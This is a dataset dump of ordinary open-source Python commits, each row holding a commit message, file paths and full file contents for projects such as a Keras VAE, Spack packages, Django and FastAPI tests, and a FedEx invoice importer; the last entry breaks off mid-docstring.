commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values |
|---|---|---|---|---|---|---|---|---|
913610bafe6aa98f7b8c550ea2ee896b130310ec | Add VAE code | wiseodd/hipsternet,wiseodd/hipsternet | adhoc/vae.py | adhoc/vae.py | from tensorflow.examples.tutorials.mnist import input_data
from keras.layers import Input, Dense, Lambda
from keras.models import Model
from keras.objectives import binary_crossentropy
from keras.callbacks import LearningRateScheduler
import numpy as np
import matplotlib.pyplot as plt
import keras.backend as K
import tensorflow as tf
tf.python.control_flow_ops = tf
def lr_scheduler(epoch):
if 0 <= epoch < 10:
return 1e-3
if 10 <= epoch < 20:
return 1e-4
if 20 <= epoch < 30:
return 1e-5
return 1e-6
mnist = input_data.read_data_sets('../data/MNIST_data', one_hot=False)
X_train = mnist.train.images
X_test, y_test = mnist.test.images, mnist.test.labels
m = 50
n_z = 2
n_epoch = 50
# Q(z|X) -- encoder
inputs = Input(shape=(784,))
h_q = Dense(512, activation='relu')(inputs)
mu = Dense(n_z, activation='linear')(h_q)
log_sigma = Dense(n_z, activation='linear')(h_q)
def sample_z(args):
mu, log_sigma = args
eps = K.random_normal(shape=(m, n_z), mean=0., std=1.)
return mu + K.exp(log_sigma / 2) * eps
# Sample z ~ Q(z|X)
z = Lambda(sample_z)([mu, log_sigma])
# P(X|z) -- decoder
decoder_hidden = Dense(512, activation='relu')
decoder_out = Dense(784, activation='sigmoid')
h_p = decoder_hidden(z)
outputs = decoder_out(h_p)
def vae_loss(y_true, y_pred):
""" Calculate loss = reconstruction loss + KL loss for each data in minibatch """
# E[log P(X|z)]
recon = K.sum(K.binary_crossentropy(y_pred, y_true), axis=1)
# D_KL(Q(z|X) || P(z)); calculate in closed form as both dist. are Gaussian
kl = 0.5 * K.sum(K.exp(log_sigma) + K.square(mu) - 1. - log_sigma, axis=1)
return recon + kl
# We now have 3 models: encoder, decoder, & VAE (encoder + decoder)
vae = Model(inputs, outputs)
vae.compile(optimizer='adam', loss=vae_loss)
vae.fit(X_train, X_train, batch_size=m, nb_epoch=n_epoch, callbacks=[LearningRateScheduler(lr_scheduler)])
encoder = Model(inputs, mu)
d_in = Input(shape=(n_z,))
d_h = decoder_hidden(d_in)
d_out = decoder_out(d_h)
decoder = Model(d_in, d_out)
# Latent space visualization
encoded = encoder.predict(X_test, batch_size=m)
plt.figure(figsize=(6, 6))
plt.scatter(encoded[:, 0], encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# Reconstruction visualization
idxs = np.random.randint(0, X_test.shape[0], size=m)
X_test_subset = X_test[idxs]
X_recons = vae.predict(X_test_subset, batch_size=m)
n = 10
plt.figure(figsize=(20, 4))
for i in range(1, n+1):
# Original
ax = plt.subplot(2, n, i)
plt.imshow(X_test_subset[i].reshape(28, 28), cmap='Greys_r')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Reconstruction
ax = plt.subplot(2, n, i+n)
plt.imshow(X_recons[i].reshape(28, 28), cmap='Greys_r')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
# Generating new samples from latent space; P(X|z) visualization
z_sample = np.random.randn(n, n_z)
X_gen = decoder.predict(z_sample)
plt.figure(figsize=(20, 4))
for i in range(1, n+1):
ax = plt.subplot(1, n, i)
plt.imshow(X_gen[i-1].reshape(28, 28), cmap='Greys_r')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show()
| unlicense | Python | |
d3f556b6d7da2c67fc9dcc6b7d73a0d1b76d278c | Add tests for valid recipes | mandeep/conda-verify | tests/functional_tests/test_valid_recipes.py | tests/functional_tests/test_valid_recipes.py | import os
import pytest
from conda_verify import utils
from conda_verify.exceptions import RecipeError
from conda_verify.verify import Verify
@pytest.fixture
def recipe_dir():
return os.path.join(os.path.dirname(__file__), 'test-recipes')
@pytest.fixture
def verifier():
recipe_verifier = Verify()
return recipe_verifier
def test_valid_recipe_named_icu(recipe_dir, verifier):
recipe = os.path.join(recipe_dir, 'icu')
metadata = utils.render_metadata(recipe, None)
try:
verifier.verify_recipe(pedantic=False, rendered_meta=metadata,
recipe_dir=recipe)
except RecipeError as error:
pytest.fail(error)
def test_valid_test_file(recipe_dir, verifier):
recipe = os.path.join(recipe_dir, 'valid_test_file')
metadata = utils.render_metadata(recipe, None)
try:
verifier.verify_recipe(pedantic=False, rendered_meta=metadata,
recipe_dir=recipe)
except RecipeError as error:
pytest.fail(error)
| bsd-3-clause | Python | |
40f4bc4602da9f66c08a6ee7dcdb3af71e891441 | Create Python1.py | computer19810/PythonNew | Python1.py | Python1.py | #!/usr/bin/env python
def main():
print('hello world')
print '------------'
main()
| apache-2.0 | Python | |
0209c363371b0f1a8b570deab4995e83a638222d | Write New Product tests | osu-cass/whats-fresh-api,iCHAIT/whats-fresh-api,osu-cass/whats-fresh-api,iCHAIT/whats-fresh-api,osu-cass/whats-fresh-api,iCHAIT/whats-fresh-api,iCHAIT/whats-fresh-api,osu-cass/whats-fresh-api | whats_fresh/whats_fresh_api/tests/views/entry/test_new_product.py | whats_fresh/whats_fresh_api/tests/views/entry/test_new_product.py | from django.test import TestCase
from django.core.urlresolvers import reverse
from whats_fresh_api.models import *
from django.contrib.gis.db import models
import json
class NewProductTestCase(TestCase):
"""
Test that the New Product page works as expected.
Things tested:
URLs reverse correctly
The outputted page has the correct form fields
POSTing "correct" data will result in the creation of a new
object with the specified details
POSTing data with all fields missing (hitting "save" without entering
data) returns the same field with notations of missing fields
"""
def test_url_endpoint(self):
url = reverse('new-product')
self.assertEqual(url, '/entry/products/new')
def test_form_fields(self):
"""
Tests to see if the form contains all of the right fields
"""
response = self.client.get(reverse('new-product'))
fields = {'name': 'input', 'variety': 'input', 'story_id': 'select',
'alt_name': 'input', 'description': 'input',
'origin': 'input', 'season': 'input', 'available': 'select',
'market_price': 'input', 'link': 'input',
'image_id': 'select'}
form = response.context['product_form']
for field in fields:
# for the Edit tests, you should be able to access
# form[field].value
self.assertIn(fields[field], str(form[field]))
def test_successful_product_creation(self):
"""
POST a proper "new product" command to the server, and see if the
new product appears in the database
"""
# Create objects that we'll be setting as the foreign objects for
# our test product
# It needs a story, and we'll want multiple product_preparations to
# allow us to test the multi-product logic.
# We can't predict what the ID of the new product will be, so we can
# delete all of the vendors, and then choose the only vendor left
# after creation.
Product.objects.all().delete()
Story.objects.create(id=1)
Image.objects.create(id=1)
# Data that we'll post to the server to get the new vendor created
new_product = {'name': 'Salmon', 'variety': 'Pacific', 'story_id': 1,
'alt_name': 'Pacific Salmon', 'origin': 'The Pacific',
'description': 'It\'s salmon -- from the Pacific!',
'season': 'Always', 'available': '', 'image_id': 1,
'market_price': '$3 a pack',
'link': 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'}
response = self.client.post(reverse('new-product'), new_product)
# These values are changed by the server after being received from
# the client/web page.
new_product['available'] = None
new_product['story_id'] = Story.objects.get(id=new_product['story_id'])
new_product['image_id'] = Image.objects.get(id=new_product['image_id'])
product = Product.objects.all()[0]
for field in new_product:
self.assertEqual(getattr(product, field), new_product[field])
def test_no_data_error(self):
"""
POST a "new product" command to the server missing all of the
required fields, and test to see what the error comes back as.
"""
# Create a list of all objects before sending bad POST data
all_products = Product.objects.all()
response = self.client.post(reverse('new-product'))
required_fields = ['name', 'description', 'season', 'market_price']
for field_name in required_fields:
self.assertIn(field_name, response.context['product_form'].errors)
# Test that we didn't add any new objects
self.assertTrue(list(Product.objects.all()) == list(all_products))
| apache-2.0 | Python | |
1de7573b08274646d961e7a667ed48aff5ca2932 | return export path from Rule.do_build() | buildinspace/peru,oconnor663/peru,ierceg/peru,scalp42/peru,nivertech/peru,buildinspace/peru,oconnor663/peru,enzochiau/peru,scalp42/peru,olson-sean-k/peru,nivertech/peru,ierceg/peru,olson-sean-k/peru,enzochiau/peru | peru/rule.py | peru/rule.py | import os
import subprocess
from .cache import compute_key
from .error import PrintableError
class Rule:
def __init__(self, name, build_command, export):
self.name = name
self.build_command = build_command
self.export = export
def cache_key(self, resolver, input_tree):
return compute_key({
"input_tree": input_tree,
"build": self.build_command,
"export": self.export,
})
def do_build(self, path):
"""Executes the rule and returns the exported directory."""
if self.build_command:
try:
subprocess.check_call(self.build_command, shell=True, cwd=path)
except subprocess.CalledProcessError as e:
raise PrintableError("Error in build command: " + str(e))
if self.export:
export_path = os.path.join(path, self.export)
if not os.path.exists(export_path):
raise PrintableError(
"export path for rule '{}' does not exist: {}".format(
self.name, export_path))
if not os.path.isdir(export_path):
raise PrintableError(
"export path for rule '{}' is not a directory: {}"
.format(self.name, export_path))
return export_path
else:
return path
def get_tree(self, cache, resolver, input_tree):
key = self.cache_key(resolver, input_tree)
if key in cache.keyval:
return cache.keyval[key]
with cache.tmp_dir() as tmp_dir:
cache.export_tree(input_tree, tmp_dir)
export_dir = self.do_build(tmp_dir)
tree = cache.import_tree(export_dir)
cache.keyval[key] = tree
return tree
| import os
import subprocess
from .cache import compute_key
from .error import PrintableError
class Rule:
def __init__(self, name, build_command, export):
self.name = name
self.build_command = build_command
self.export = export
def cache_key(self, resolver, input_tree):
return compute_key({
"input_tree": input_tree,
"build": self.build_command,
"export": self.export,
})
def do_build(self, path):
if not self.build_command:
return
try:
subprocess.check_call(self.build_command, shell=True, cwd=path)
except subprocess.CalledProcessError as e:
raise PrintableError("Error in build command: " + str(e))
def get_tree(self, cache, resolver, input_tree):
key = self.cache_key(resolver, input_tree)
if key in cache.keyval:
return cache.keyval[key]
with cache.tmp_dir() as tmp_dir:
cache.export_tree(input_tree, tmp_dir)
self.do_build(tmp_dir)
export_dir = tmp_dir
if self.export:
export_dir = os.path.join(tmp_dir, self.export)
if not os.path.exists(export_dir):
raise RuntimeError(
"export dir '{}' doesn't exist".format(self.export))
tree = cache.import_tree(export_dir)
cache.keyval[key] = tree
return tree
| mit | Python |
729bed3fd3e7bd3ecabda3ab25525019f3f83661 | Add py-imageio for python3 (#8553) | iulian787/spack,matthiasdiener/spack,mfherbst/spack,krafczyk/spack,iulian787/spack,LLNL/spack,krafczyk/spack,iulian787/spack,matthiasdiener/spack,mfherbst/spack,mfherbst/spack,LLNL/spack,LLNL/spack,matthiasdiener/spack,krafczyk/spack,matthiasdiener/spack,mfherbst/spack,LLNL/spack,matthiasdiener/spack,iulian787/spack,mfherbst/spack,iulian787/spack,LLNL/spack,krafczyk/spack,krafczyk/spack | var/spack/repos/builtin/packages/py-imageio/package.py | var/spack/repos/builtin/packages/py-imageio/package.py | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyImageio(PythonPackage):
""" Imageio is a Python library that provides an easy interface
to read and write a wide range of image data, including animated
images, video, volumetric data, and scientific formats. It is
cross-platform, runs on Python 2.7 and 3.4+, and is easy to install."""
homepage = "http://imageio.github.io/"
url = "https://pypi.io/packages/source/i/imageio/imageio-2.3.0.tar.gz"
version('2.3.0', '4722c4e1c366748abcb18729881cffb8')
# TODO: Add variants for plugins, and optional dependencies
# Fix for python 2 if needed.
depends_on('py-numpy', type=('build', 'run'))
depends_on('py-pillow', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('ffmpeg', type='run')
| lgpl-2.1 | Python | |
1cb2855054c40e6de7c6f9bf8efb7c8331009ca8 | add new package (#24702) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/py-iso8601/package.py | var/spack/repos/builtin/packages/py-iso8601/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyIso8601(PythonPackage):
"""Simple module to parse ISO 8601 dates"""
homepage = "https://pyiso8601.readthedocs.io/en/latest/"
pypi = "iso8601/iso8601-0.1.14.tar.gz"
version('0.1.14', sha256='8aafd56fa0290496c5edbb13c311f78fa3a241f0853540da09d9363eae3ebd79')
depends_on('py-setuptools', type='build')
| lgpl-2.1 | Python | |
ace0f80344519a747a71e09faca46c05594dd0d9 | Add examples/req_rep.py | smira/txZMQ | examples/req_rep.py | examples/req_rep.py | #!env/bin/python
"""
Example txzmq client.
examples/req_rep.py --method=connect --endpoint=ipc:///tmp/req_rep_sock --mode=req
examples/req_rep.py --method=bind --endpoint=ipc:///tmp/req_rep_sock --mode=rep
"""
import os
import socket
import sys
import time
import zmq
from optparse import OptionParser
from twisted.internet import reactor
rootdir = os.path.realpath(os.path.join(os.path.dirname(sys.argv[0]), '..'))
sys.path.insert(0, rootdir)
os.chdir(rootdir)
from txzmq import ZmqEndpoint, ZmqFactory, ZmqREQConnection, ZmqREPConnection
parser = OptionParser("")
parser.add_option("-m", "--method", dest="method", help="0MQ socket connection: bind|connect")
parser.add_option("-e", "--endpoint", dest="endpoint", help="0MQ Endpoint")
parser.add_option("-M", "--mode", dest="mode", help="Mode: req|rep")
parser.set_defaults(method="connect", endpoint="ipc:///tmp/txzmq-pc-demo")
(options, args) = parser.parse_args()
zf = ZmqFactory()
e = ZmqEndpoint(options.method, options.endpoint)
if options.mode == "req":
s = ZmqREQConnection(zf, e)
def produce():
# data = [str(time.time()), socket.gethostname()]
data = str(time.time())
print "Requesting %r" % data
try:
d = s.sendMsg(data)
def doPrint(reply):
print("Got reply: %s" % (reply))
d.addCallback(doPrint)
except zmq.error.Again:
print "Skipping, no pull consumers..."
reactor.callLater(1, produce)
reactor.callWhenRunning(reactor.callLater, 1, produce)
else:
s = ZmqREPConnection(zf, e)
def doPrint(messageId, message):
print "Replying to %s, %r" % (messageId, message)
s.reply(messageId, "%s %r " % (messageId, message))
s.gotMessage = doPrint
reactor.run()
| mpl-2.0 | Python | |
9805f9a4e837f3897fc5146c4a9b4d89a0c3f913 | Revert "deleted" | charman2/rsas | examples/steady2.py | examples/steady2.py | # -*- coding: utf-8 -*-
"""Storage selection (SAS) functions: example with two flux out at steady state
Runs the rSAS model for a synthetic dataset with two flux in and out
and steady state flow
Theory is presented in:
Harman, C. J. (2014), Time-variable transit time distributions and transport:
Theory and application to storage-dependent transport of chloride in a watershed,
Water Resour. Res., 51, doi:10.1002/2014WR015707.
"""
from __future__ import division
import rsas
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Initializes the random number generator so we always get the same result
np.random.seed(0)
# =====================================
# Generate the input timeseries
# =====================================
# length of the dataset
N = 100
S_0 = 10. # <-- volume of the uniformly sampled store
Q_0 = 1. # <-- steady-state flow rate
T_0 = S_0 / (2 * Q_0)
# Note that the analytical solution for the cumulative TTD is
T = np.arange(N+1)
PQ_exact = 1 - np.exp(-T/T_0)
# Steady-state flow in and out for N timesteps
J = np.ones(N) * Q_0 * 2
Q1 = np.ones(N) * Q_0 * 1.9
Q2 = np.ones(N) * Q_0 * 0.1
# A random timeseries of concentrations
C_J = -np.log(np.random.rand(N))
# =========================
# Parameters needed by rsas
# =========================
# The concentration of water older than the start of observations
C_old = 0.
# =========================
# Create the rsas functions
# =========================
# Parameters for the rSAS function
# The uniform distribution extends between S_T=a and S_T=b.
Q_rSAS_fun_type = 'gamma'
Smin = np.ones(N) * 0.
S0 = np.ones(N) * S_0
alpha = np.ones(N) * 0.5
Q_rSAS_fun_parameters = np.c_[Smin, S0, alpha]
rSAS_fun_Q1 = rsas.create_function(Q_rSAS_fun_type, Q_rSAS_fun_parameters)
Q_rSAS_fun_type = 'uniform'
a = np.ones(N) * 0.
b = np.ones(N) * S_0/5.
Q_rSAS_fun_parameters = np.c_[a, b]
rSAS_fun_Q2 = rsas.create_function(Q_rSAS_fun_type, Q_rSAS_fun_parameters)
# =================
# Initial condition
# =================
# Unknown initial age distribution, so just set this to zeros
ST_init = np.zeros(N + 1)
# =============
# Run the model
# =============
# Run it
outputs = rsas.solve(J, [Q1, Q2], [rSAS_fun_Q1, rSAS_fun_Q2], ST_init=ST_init,
mode='time', dt = 1., n_substeps=10, C_in=C_J, C_old=C_old)
# Let's pull these out to make the outputs from rsas crystal clear
PQ1 = outputs['PQ'][0]
PQ2 = outputs['PQ'][1]
C_outi = outputs['C_out'][0]
ST = outputs['ST']
# ==================================
# Plot the transit time distribution
# ==================================
fig = plt.figure(1)
plt.clf()
plt.plot(PQ1[:,-1], 'b--', label='rsas model, Q1', lw=2)
plt.plot(PQ2[:,-1], 'b:', label='rsas model, Q2', lw=2)
plt.plot(PQ_exact, 'r-.', label='analytical solution', lw=2)
plt.ylim((0,1))
plt.xlim((0,4*T_0))
plt.legend(loc=0)
plt.ylabel('P_Q(T)')
plt.xlabel('age T')
plt.title('Cumulative transit time distribution')
#%%
# =====================================================================
# Convolve the transit time distributions with the input concentrations
# =====================================================================
# Use the estimated transit time distribution and input timeseries to estimate
# the output timeseries
C_outb, C_mod_raw, observed_fraction = rsas.transport(PQ1, C_J, C_old)
# Calculate the output concentration using the analytical TTD
T=np.arange(N*100.+1)/100
PQe = np.tile(1-np.exp(-T/T_0), (N*100.+1, 1)).T
C_oute, C_mod_raw, observed_fraction = rsas.transport(PQe, C_J.repeat(100), C_old)
# Plot the result
fig = plt.figure(2)
plt.clf()
plt.plot(np.arange(N)+1, C_outb, 'b-', label='rsas.transport', lw=2)
plt.plot(np.arange(N)+1, C_outi, 'g--', label='rsas internal', lw=2)
plt.plot(T[1:], C_oute, 'r-.', label='rsas exact', lw=2)
plt.legend(loc=0)
plt.ylabel('Concentration [-]')
plt.xlabel('time')
plt.title('Outflow concentration')
plt.show()
| mit | Python | |
3513b039b90e4b16d94fedb3f9715918eaa3bc36 | Test cookies | tiangolo/fastapi,tiangolo/fastapi,tiangolo/fastapi | tests/test_tutorial/test_cookie_params/test_tutorial001.py | tests/test_tutorial/test_cookie_params/test_tutorial001.py | import sys
import pytest
from starlette.testclient import TestClient
from cookie_params.tutorial001 import app
client = TestClient(app)
print(sys.path)
openapi_schema = {
"openapi": "3.0.2",
"info": {"title": "Fast API", "version": "0.1.0"},
"paths": {
"/items/": {
"get": {
"responses": {
"200": {
"description": "Successful Response",
"content": {"application/json": {"schema": {}}},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"summary": "Read Items Get",
"operationId": "read_items_items__get",
"parameters": [
{
"required": False,
"schema": {"title": "Ads_Id", "type": "string"},
"name": "ads_id",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {"type": "string"},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
@pytest.mark.parametrize(
"path,cookies,expected_status,expected_response",
[
("/openapi.json", None, 200, openapi_schema),
("/items", None, 200, {"ads_id": None}),
("/items", {"ads_id": "ads_track"}, 200, {"ads_id": "ads_track"}),
("/items", {"ads_id": "ads_track", "session": "cookiesession"}, 200, {"ads_id": "ads_track"}),
("/items", {"session": "cookiesession"}, 200, {"ads_id": None}),
],
)
def test(path, cookies, expected_status, expected_response):
response = client.get(path, cookies=cookies)
assert response.status_code == expected_status
assert response.json() == expected_response
| mit | Python | |
3ed611cebed6c9283b5668a7c237deae265fdd64 | create fedex_cir_import.py | robsuttonjr/public_python | fedex_cir_import.py | fedex_cir_import.py | import os, pdb, psycopg2
print 'begin script - fedex_cir_import.py'
path = '/usr/local/cirdata/'
imported = '/usr/local/cirdata/imported/'
phoenixDB = psycopg2.connect("dbname='database' user='user' host='host' password='password'")
for file in os.listdir(path):
current = os.path.join(path, file)
if os.path.isfile(current):
ediNumber = ''
invoiceDate = ''
invoiceNumber = ''
accountNumber = ''
numberAirbills = ''
invoiceAmount = ''
fileTotal = ''
rowOn = False
nextLineLast = False
data = open(current, "rb")
for line in data:
#print line
if 'Contact' in line:
ediNumber = line.split(':')[2].replace('\r\n','').replace(' ','')
if 'Address' in line:
invoiceDate = line.split(':')[2].replace('\r\n','').replace(' ','')
invoiceDate = invoiceDate[6:]+'-'+invoiceDate[:-8]+'-'+invoiceDate[3:-5]
if 'Customer Nbr' in line:
rowOn = True
if rowOn == True and 'Customer Nbr' not in line:
if line == '\r\n':
nextLineLast = True
else:
if nextLineLast == False:
try:
invoiceNumber = line.split()[1].replace('\r\n','')
accountNumber = line.split()[0].replace('\r\n','').zfill(9)
numberAirbills = line.split()[2].replace('\r\n','')
invoiceAmount = line.split()[3].replace('\r\n','')
except:
pass
cursorPhoenix = phoenixDB.cursor()
insertText = """insert into configmgr_fedexcir (edi_number, invoice_date, account_number, invoice_number, number_of_airbills, invoice_amount, file_name) values ('%s', '%s', '%s', %s, %s, '%s', '%s')""" % (ediNumber, invoiceDate, accountNumber, invoiceNumber, numberAirbills, invoiceAmount, file)
try:
if rowOn == True and nextLineLast == False:
print file, fileTotal, ediNumber, invoiceDate, accountNumber, invoiceNumber, numberAirbills, invoiceAmount
cursorPhoenix.execute("""select * from configmgr_fedexcir where edi_number = '%s' and invoice_date = '%s' and account_number = '%s' and invoice_number = '%s' """ % (ediNumber, invoiceDate, accountNumber, invoiceNumber))
results = cursorPhoenix.fetchone()
if results is None:
cursorPhoenix.execute(insertText)
phoenixDB.commit()
except:
print 'insert failed: ' + insertText
if nextLineLast == True and line != '\r\n':
rowOn = False
fileTotal = line.split()[2].replace('\r\n','')
cursorPhoenix = phoenixDB.cursor()
updateString = """update configmgr_fedexcir set file_total = '%s' where file_name = '%s' """ % (fileTotal, file)
cursorPhoenix.execute(updateString)
phoenixDB.commit()
os.rename(os.path.join(path, file), os.path.join(imported, file))
print 'end script - fedex_cir_import.py'
| mit | Python | |
513df9e9ce48c7877244d5c9ad1dcf220d368386 | Add findexposurehist to finde exposure dist for each country. | c4fcm/WhatWeWatch-Analysis,c4fcm/WhatWeWatch-Analysis,c4fcm/WhatWeWatch-Analysis | findexposurehist.py | findexposurehist.py | from __future__ import division
import ConfigParser
import csv
import time
import datetime
import matplotlib; matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
import scipy.stats as spstats
import exposure
import util
def main():
# Read config
config = ConfigParser.RawConfigParser()
config.read('app.config')
exp_id = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print 'Running findexposurehist/%s' % exp_id
# Read data file, save country codes and country-video pairs
filename = 'data/%s' % config.get('data', 'filename')
data = util.VideoData.from_csv(filename)
# Plot and save exposure histograms
results = find_pair_stats(data, exp_id)
def find_pair_stats(data, exp_id):
countries = data.countries
for country in countries:
exposures = []
for target in countries:
if target == country:
continue
# Find video exposure
h = data.country_lookup.tok2id[country]
t = data.country_lookup.tok2id[target]
exposures.append(exposure.symmetric(data.counts[t,:], data.counts[h,:]))
# Plot
util.create_result_dir('findexposurehist', exp_id)
fdtitle = {'fontsize':10}
fdaxis = {'fontsize':8}
f = plt.figure(figsize=(3.3125, 3.3125))
plt.show()
plt.hist(exposures, bins=20)
hx = plt.xlabel('Video Exposure', fontdict=fdaxis)
hy = plt.ylabel('Count', fontdict=fdaxis)
ht = plt.title('Exposure Histogram (%s)' % country, fontdict=fdtitle)
plt.tick_params('both', labelsize='7')
plt.tight_layout()
f.savefig('results/findexposurehist/%s/exposurehist-%s.eps' % (exp_id, country))
if __name__ == '__main__':
main()
| bsd-3-clause | Python | |
539098d24cb671fe30543917928404a8de0f02e5 | make video using ffmpeg | SNU-sunday/fisspy | fisspy/makemovie.py | fisspy/makemovie.py | """
Makevideo
Using the ffmpeg make a movie file from images
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import subprocess as sp
import platform
from matplotlib.pyplot import imread
from shutil import copy2
import os
__author__="J. Kang: jhkang@astro.snu.ac.kr"
__email__="jhkang@astro.snu.ac.kr"
__date__="Nov 08 2016"
def makevideo(imgstr,fpsi,movie_name='video.mp4'):
os_name=platform.system()
if os_name == 'Windows':
FFMPEG_BIN = "ffmpeg.exe"
else:
FFMPEG_BIN = "ffmpeg"
exten=movie_name.split('.')[1]
if exten == 'mp4':
codec='libx264'
elif exten == 'avi':
codec='libxvid'
elif exten == 'mov':
codec='mpeg4'
else:
codec=''
n=len(imgstr)
if n == 0:
raise ValueError('Image list has no element!')
fps=str(fpsi)
img=imread(imgstr[0])
size=img.shape
xsize=size[0]
ysize=size[1]
if np.mod(xsize*ysize,2) == 0:
raise ValueError("The size of the image shuld be even numbers.")
newname=np.arange(n)
newname=np.char.add('_',newname.astype(str))
newname=np.char.add(newname,'.png')
for i in range(n):
copy2(imgstr[i],newname[i])
cmd=[FFMPEG_BIN,
'-i', '_%d.png'
'-y',
'-s',str(xsize)+'x'+str(ysize),
'-pix_fmt','yuv420p',
'-r',fps,
'-c:v',codec,
'q:v 1',movie_name]
pipe = sp.Popen(cmd,stdin=sp.PIPE,stderr=sp.PIPE) | bsd-2-clause | Python | |
ef20713c0b4b7378fe91aae095258452d01e81ba | Create 1.py | satishgoda/learningqt,satishgoda/learningqt | basics/action/QWidgetAction/1.py | basics/action/QWidgetAction/1.py | class SelectionSetsView(QTableView):
def _onContextMenu(self, widget, pos):
menu = QtGui.QMenu()
colorAction = menu.addAction("Edit Color")
colorAction.triggered.connect(partial(self._editColor, widget, pos))
colorWidgetAction = QtGui.QWidgetAction(menu)
cbg = ColoredButtonGroup(6)
cbg.currentColorChosen.connect(widget.colorize)
colorWidgetAction.setDefaultWidget(cbg)
menu.addAction(colorWidgetAction)
widget.addActionsTo(menu)
menu.exec_(widget.mapToGlobal(pos))
| mit | Python | |
2e558cc09729d5e87d13ddea0f19a82dd7e7ac05 | add file at company | zmsch27/Python | Python_FunctionalProgramming.py | Python_FunctionalProgramming.py | #以下来自廖雪峰的Python学习之Python函数式编程
#我们首先要搞明白计算机(Computer)和计算(Compute)的概念。
#在计算机的层次上,CPU执行的是加减乘除的指令代码,以及各种条件判断和跳转指令,所以,汇编语言是最贴近计算机的语言。
#而计算则指数学意义上的计算,越是抽象的计算,离计算机硬件越远。
#对应到编程语言,就是越低级的语言,越贴近计算机,抽象程度低,执行效率高,比如C语言;越高级的语言,越贴近计算,抽象程度高,执行效率低,比如Lisp语言。
#高阶函数///////////////////////////////////
#变量可以指向函数
print('abs(-10) =', abs(-10))
print('abs =', abs)
f = abs
print('f =', f)
print('f(-10) =', f(-10))
#函数名其实就是指向函数的变量!对于abs()这个函数,完全可以把函数名abs看成变量,它指向一个可以计算绝对值的函数!如果把abs指向其他对象,会有什么情况发生?
#abs = 10
#print('abs(-10) =', abs(-10)) #这个会报错
#既然变量可以指向函数,函数的参数能接收变量,那么一个函数就可以接收另一个函数作为参数,这种函数就称之为高阶函数
def add(x, y, z):
return z(x) + z(y)
result = add(-9, 2, abs)
print('add(-9, 2, abs) =', result)
#编写高阶函数,就是让函数的参数能够接收别的函数。 把函数作为参数传入,这样的函数称为高阶函数,函数式编程就是指这种高度抽象的编程范式。
print('-----------------------------------------')
#map/reduce----------------
| apache-2.0 | Python | |
89615f5ce8d6433721f5b4e1130de2433c16d0eb | Add candidate.py, with candidate_rules a clone of basic_rules in cdr_matrices.py. | jfine2358/py-linhomy | py/linhomy/candidate.py | py/linhomy/candidate.py | '''
>>> candidate_matrices.print_C_stats(10)
0 [(1, 1)]
1 [(0, 1), (1, 1)]
2 [(0, 3), (1, 3)]
3 [(0, 11), (1, 4)]
4 [(0, 33), (1, 7)]
5 [(0, 92), (1, 12)]
6 [(0, 254), (1, 19)]
7 [(0, 682), (1, 32)]
8 [(0, 1818), (1, 52)]
9 [(0, 4810), (1, 85)]
10 [(0, 12677), (1, 139)]
As expected, all zeros and ones.
>>> candidate_matrices.print_D_stats(10)
0 [(0, 1), (1, 1)]
1 [(0, 2), (1, 1)]
2 [(0, 8), (1, 2)]
3 [(0, 21), (1, 3)]
4 [(0, 60), (1, 5)]
5 [(0, 160), (1, 8)]
6 [(0, 429), (1, 13)]
7 [(0, 1134), (1, 21)]
8 [(0, 2992), (1, 34)]
9 [(0, 7865), (1, 55)]
10 [(0, 20648), (1, 89)]
Some negatives, that must be removed. Good outcome for little input.
>>> candidate_matrices.print_product_stats(10)
2 1 [(1, 2)]
3 1 [(0, 3), (1, 3)]
4 1 [(0, 9), (1, 6)]
4 2 [(0, 14), (1, 6)]
5 1 [(0, 31), (1, 9)]
5 2 [(0, 37), (1, 11)]
6 1 [(0, 88), (1, 16)]
6 2 [(0, 112), (1, 18)]
6 3 [(0, 93), (1, 23), (2, 1)]
7 1 [(0, 247), (1, 26)]
